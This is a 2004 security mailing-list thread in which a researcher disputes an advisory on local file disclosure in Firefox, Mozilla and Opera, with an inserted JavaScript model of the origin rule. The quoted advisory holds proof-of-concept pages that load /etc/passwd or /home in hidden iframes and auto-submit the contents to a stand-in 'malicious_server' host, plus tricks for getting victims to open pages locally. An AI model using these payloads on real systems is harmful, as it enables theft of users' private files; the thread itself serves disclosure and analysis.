From: thor at pivx.com (Thor Larholm)
Subject: Disclosure of local file content in Mozilla Firefox and Opera

This is not a vulnerability, it is expected behavior.

Mozilla shares the same zone design as IE which means that a file from the local file zone can read any other file from the local file zone. You cannot use this approach to read a local file from another zone such as the Internet zone. From the Internet zone, you can also only read the content of files from the same zone, same protocol and same domain.

I agree that Mozilla has implemented quite a lot of proprietary IE extensions which it should not have done; however, reading the innerHTML of an element through document.all does not circumvent the traditional zone security checks already in place.



Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor@...x.com
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6  20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. 
<http://www.pivx.com/qwikfix>  

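An added illustration (example code, not from either message in this thread): a small JavaScript model of the "same protocol, same domain" rule described above, applied to the URLs from the quoted PoC. It shows why the file:// iframe is readable only when the page itself is opened from file://, and blocked when the same page is served from http://malicious_server. The `originOf`/`canRead` helpers and the `fileIsOneOrigin` flag are assumptions of this model, not browser APIs.

```javascript
// Added example, not code from either message: a toy model of the origin rule
// stated above (same protocol, same domain, same port), applied to the URLs
// that appear in the quoted PoC. No browser internals are used; this only
// reproduces the decision a 2004-era browser made for a frame access.

function originOf(urlString) {
  const u = new URL(urlString);
  // Fill in default ports so http://host and http://host:80 compare equal.
  const defaultPorts = { "http:": "80", "https:": "443" };
  return {
    protocol: u.protocol,
    host: u.hostname,               // file:// URLs have an empty host
    port: u.port || defaultPorts[u.protocol] || "",
  };
}

// fileIsOneOrigin = true models the behaviour the thread discusses: every
// file:// document belongs to one "local file zone" and may read any other
// file:// document. Modern browsers give each local file a unique origin,
// which corresponds to passing false. (Assumption of this model.)
function canRead(readerUrl, frameUrl, fileIsOneOrigin = true) {
  const a = originOf(readerUrl);
  const b = originOf(frameUrl);
  if (a.protocol === "file:" && b.protocol === "file:") return fileIsOneOrigin;
  return a.protocol === b.protocol && a.host === b.host && a.port === b.port;
}

// Constructed cases mirroring the thread: the PoC page opened locally, the
// same page served remotely, and two ordinary web origins.
const CASES = [
  { reader: "file:///tmp/code.htm",              frame: "file:///etc/passwd" },
  { reader: "http://malicious_server/page.htm", frame: "file:///etc/passwd" },
  { reader: "http://malicious_server/page.htm", frame: "http://malicious_server/grab.php" },
  { reader: "https://example.test/",            frame: "http://example.test/" },
];

function evaluateCases(fileIsOneOrigin = true) {
  return CASES.map((c) => ({ ...c, readable: canRead(c.reader, c.frame, fileIsOneOrigin) }));
}

for (const r of evaluateCases()) {
  console.log(`${r.readable ? "READABLE" : "blocked "} ${r.reader} -> ${r.frame}`);
}
```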


-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Giovanni Delvecchio
Sent: Monday, December 06, 2004 3:24 PM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera

Disclosure of local file content in Mozilla Firefox and Opera


Note:
I don't know if it could really be considered a security problem; anyway,
I'll try to explain my ideas.
Sorry for my bad English.


Author: Giovanni Delvecchio


Applications affected:

- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)

( maybe also previous versions )


Tested versions:

- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51,..7.54 on Linux



Note:
The content of the following text could also apply to other browsers; I
have checked just Mozilla, Firefox, Opera and Microsoft Internet Explorer.
Microsoft Internet Explorer seems not to be affected.




Description:
===========
A possible problem exists in some browsers where a frame can gain access to
attributes of another frame or iframe.

An application of this "bug?" could be the possibility to disclose the local
directory structure.

Moreover, there is a possibility for remote users to get the content of
target users' local files.
This can be achieved by using the .innerHTML method; such a method isn't
standard, but it's supported by most browsers like Opera and Mozilla Firefox.

With Opera, I have noted that it is possible to read the content of local files
only if they have a *.htm or *.html extension.



PoC:
===
The following PoCs refer to the Linux versions of Firefox and Opera, but
they can also be applied to the Windows versions.


Read a local file with the innerHTML method:

--------------------------------------------------------
<HTML>

<BODY onLoad="ReadFileContent()" >

<iframe name="local_file" src="file:///etc/passwd" height=0 width=0></iframe>

<form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300" >
</form>


<script>

function ReadFileContent(){

alert(local_file.document.all(0).innerHTML);

document.module.content.value+=local_file.document.all(0).innerHTML;
//send content to malicious_server
document.module.submit();
}

</script>

</body>

</html>

(*) It works with Firefox; with Opera it works only if the file has a .htm or .html
extension.
-----------------------------------------------------------




Enumerate the /home directory structure:
----------------------------------------


<html>

<body onLoad="
  for(i=0;i<local_files.document.links.length;i++)
    {document.module.content.value+=local_files.document.links.item(i);}
  alert(document.module.content.value);
  //send list_files at malicious_server
  document.module.submit();
">


<form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300" >
</form>


<iframe name="local_files" src="file:///home/" height=0 width=0></iframe>


</body>

</html>
-------------------------------------------




Impact:
======
A malicious server could :

- obtain the content of the /home/ directory (or c:\Documents and Settings\ on
Windows systems) and so know a set of usernames present on the target system.

- know if a particular program is installed on the target system for a
subsequent attack.

- Read confidential file content

- Read the browser's cache
In Opera it is located in ~/.opera/cache4, while in Mozilla Firefox it's
in /.mozilla/firefox/$RANDOM-STRING.default/Cache.
Since it is possible to enumerate the directory structure, a malicious user could
easily know the path to Firefox's cache.

Anyway, it cannot be exploited "directly" by a remote site, but only if the
page is opened from a local path (file://localpath/code.htm), since the
iframe belongs to a local domain.

Note: with Internet Explorer these PoCs don't work even locally.




Possible method of remote exploitation:
================================

Question:
How could a malicious remote user exploit it?


My idea is the following:

After the "victim" user has requested http://maliciuos_server/page.htm,
if malicious_server responds with a page containing an unknown Content-Type
field (for example text/html. , note the dot), the browser will show a
dialog window with some options (open, save, cancel). Choosing "Open" to
view this page, it will be downloaded and opened locally; the JavaScript code
will be executed in the local context.
Obviously, if the user chooses to save and opens it afterwards, the result is the same.

(*) For Opera this method of remote exploitation requires that Opera be
set as the Default Application in "handler for saved files" when the
user chooses "Open" in the dialog window.


Another possible remote exploitation, suggested by Lie Die Yu in response to a
message of mine on bugtraq
( http://www.securityfocus.com/archive/1/382855/2004-11-30/2004-12-06/0 ):

"Ask target to open an HTML file in a remote SMBFS folder - expecting
him to mount -t smbfs [...] /mnt/[...] and open "/mnt/[...].html" in Mozilla"




Vendor notice
==============
24th November 2004: I contacted Mozilla via security-at-mozilla.org
and Opera via its bug tracking page at https://bugs.opera.com/wizard/

No response from either at the moment.



Solution
========
- Disable JavaScript

Note: I have not checked, but it seems that Firefox 1.0 RC1 is not affected.



Best regards,

Giovanni Delvecchio



